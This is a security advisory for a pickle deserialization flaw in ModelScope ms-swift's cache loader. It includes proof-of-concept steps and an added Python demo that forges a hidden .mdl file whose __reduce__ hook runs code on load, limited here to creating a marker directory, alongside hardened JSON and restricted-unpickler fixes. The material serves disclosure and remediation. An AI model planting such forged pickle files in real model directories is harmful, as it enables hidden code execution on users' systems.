### Key Information Summary

#### 1. Vulnerability Overview and Impact

- **Vulnerability Type**: Deserialization of untrusted data in the ModelScope ms-swift `ModelFileSystemCache`, leading to remote code execution (RCE).
- **Affected Versions**: ModelScope/ms-swift 2.6.1 and earlier.
- **Attack Method**: The attacker crafts a malicious hidden `.mdl` cache file. When ms-swift loads it with `pickle.load()`, the untrusted pickle stream is deserialized and executes arbitrary code and commands.
- **Stealthiness**: The payload lives in a hidden (dot-prefixed) file, so victims are unlikely to notice it. The malicious code runs while the model is being loaded for training, and the training run itself proceeds normally, so users see no anomaly.

#### 2. Affected Product

- **Product**: ModelScope ms-swift
- **Module**: `ModelFileSystemCache`
- **File**: `swift/hub/utils/caching.py`
- **Version**: <= 2.6.1
- **GitHub Link**: [ModelScope ms-swift](https://github.com/modelscope/ms-swift/blob/ab38bff0387a86fd9f068246c526ee7b0d5ed139/swift/hub/utils/caching.py#L141)

#### 3. Root Cause Analysis

- **Cause**: Insecure deserialization of untrusted data: the hidden cache file is loaded with `pickle.load()`, which executes any callable referenced by the pickle stream, so whoever controls the file controls what runs.
- **Injection Point**: The `pickle.load()` call in `ModelFileSystemCache`; the exact line is referenced by the GitHub link above.
- **Remediation Recommendation**: Cache metadata and configuration files should be read with a parser that can only produce plain data and cannot express code, such as `json.load()` or `yaml.safe_load(yaml_file)`, instead of pickle. A model directory obtained from a third party must be treated as untrusted input, including its hidden files.

#### 4. PoC (Proof of Concept)

- **Steps**:
  1. Run `exploit.py` to generate a malicious `.mdl` cache file; the PoC payload creates a directory on the victim's system.
  2. Replace the original `.mdl` file in the model directory with the generated malicious `.mdl` file.
  3. Start training with the `model_id_or_path` parameter pointing at that local model directory. When the tampered `.mdl` file is loaded, the RCE triggers. The training process is not interrupted, which makes the attack stealthy and hard to detect.

#### Authors

- Hao Fan (凡浩) and Yu Rong (戎蓉)
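The following is an added, self-contained example that walks through the PoC steps and the remediation above end to end; it is illustration code written for this page, not code from the ms-swift project or from the advisory authors' `exploit.py`. `ModelFileSystemCache` is replaced by a minimal stand-in (`vulnerable_load_meta`) that only reproduces the `pickle.load()`-on-a-hidden-file pattern, and the payload is deliberately limited to creating a marker directory (the same benign effect the PoC describes) so the demonstration is harmless to run. The `__reduce__` hook is how a pickle stream names a callable to execute on load; the hardened `_NoGlobalsUnpickler` and the JSON-based `safe_load_meta` are this page's suggested fixes, not the project's actual patch.

```python
"""Forging a malicious .mdl cache file and loading it three ways.

Added example for this page (not ms-swift code).  All file names below
live in a scratch directory; the only side effect is a marker directory.
"""
import json
import os
import pickle
import tempfile


class MaliciousMeta:
    """Unpickling this object calls os.makedirs(marker_dir).

    pickle honours __reduce__: the returned callable and argument tuple
    are executed by pickle.load() before any application code sees the
    result, so the "cache metadata" never has to look like metadata.
    A real attacker would return os.system or subprocess.Popen here.
    """

    def __init__(self, marker_dir):
        self.marker_dir = marker_dir

    def __reduce__(self):
        return (os.makedirs, (self.marker_dir, 0o700, True))


def write_malicious_mdl(model_dir, marker_dir):
    """PoC step 1/2: drop a forged hidden .mdl into the model directory."""
    mdl_path = os.path.join(model_dir, ".mdl")
    with open(mdl_path, "wb") as f:
        pickle.dump(MaliciousMeta(marker_dir), f)
    return mdl_path


def vulnerable_load_meta(model_dir):
    """Stand-in for the vulnerable pattern: pickle.load() on an untrusted file.

    This mirrors the advisory's injection point in spirit only; it is not
    a copy of ModelFileSystemCache.
    """
    with open(os.path.join(model_dir, ".mdl"), "rb") as f:
        return pickle.load(f)  # the payload runs inside this call


class _NoGlobalsUnpickler(pickle.Unpickler):
    """Hardened unpickler for legacy files: refuses to resolve any global,
    so a __reduce__ payload cannot reach os.makedirs, os.system, etc."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            f"refusing to load global {module}.{name} from cache metadata")


def restricted_load_meta(model_dir):
    """Read an existing .mdl pickle while blocking every callable reference."""
    with open(os.path.join(model_dir, ".mdl"), "rb") as f:
        return _NoGlobalsUnpickler(f).load()


def safe_write_meta(model_dir, meta):
    """Remediation from the advisory: persist metadata as JSON, not pickle."""
    with open(os.path.join(model_dir, ".mdl"), "w", encoding="utf-8") as f:
        json.dump(meta, f)


def safe_load_meta(model_dir):
    """json.load() yields plain data only; it cannot execute a callable."""
    with open(os.path.join(model_dir, ".mdl"), "r", encoding="utf-8") as f:
        return json.load(f)


def demo():
    """Run the full chain in a scratch directory and report what happened."""
    with tempfile.TemporaryDirectory() as root:
        model_dir = os.path.join(root, "model")   # constructed model dir
        marker = os.path.join(root, "MARKER")     # created only by the payload
        os.makedirs(model_dir)
        write_malicious_mdl(model_dir, marker)

        before = os.path.isdir(marker)
        vulnerable_load_meta(model_dir)           # PoC step 3: payload fires
        after = os.path.isdir(marker)

        try:
            restricted_load_meta(model_dir)
            blocked = False
        except pickle.UnpicklingError:
            blocked = True                        # hardened loader refuses it

        safe_write_meta(model_dir, {"model_id": "demo/model", "revision": "v1"})
        meta = safe_load_meta(model_dir)          # JSON round-trip, no code path
        return {"before": before, "after": after, "blocked": blocked, "meta": meta}


if __name__ == "__main__":
    print(demo())
```

Running `demo()` shows the marker directory absent before `pickle.load()` and present after it, the restricted unpickler rejecting the same file, and the JSON replacement round-tripping the metadata. Note that `_NoGlobalsUnpickler` is only a stop-gap for reading files that already exist; a pickle that needs no globals at all is rare in practice, so the durable fix is the JSON (or `yaml.safe_load`) format change.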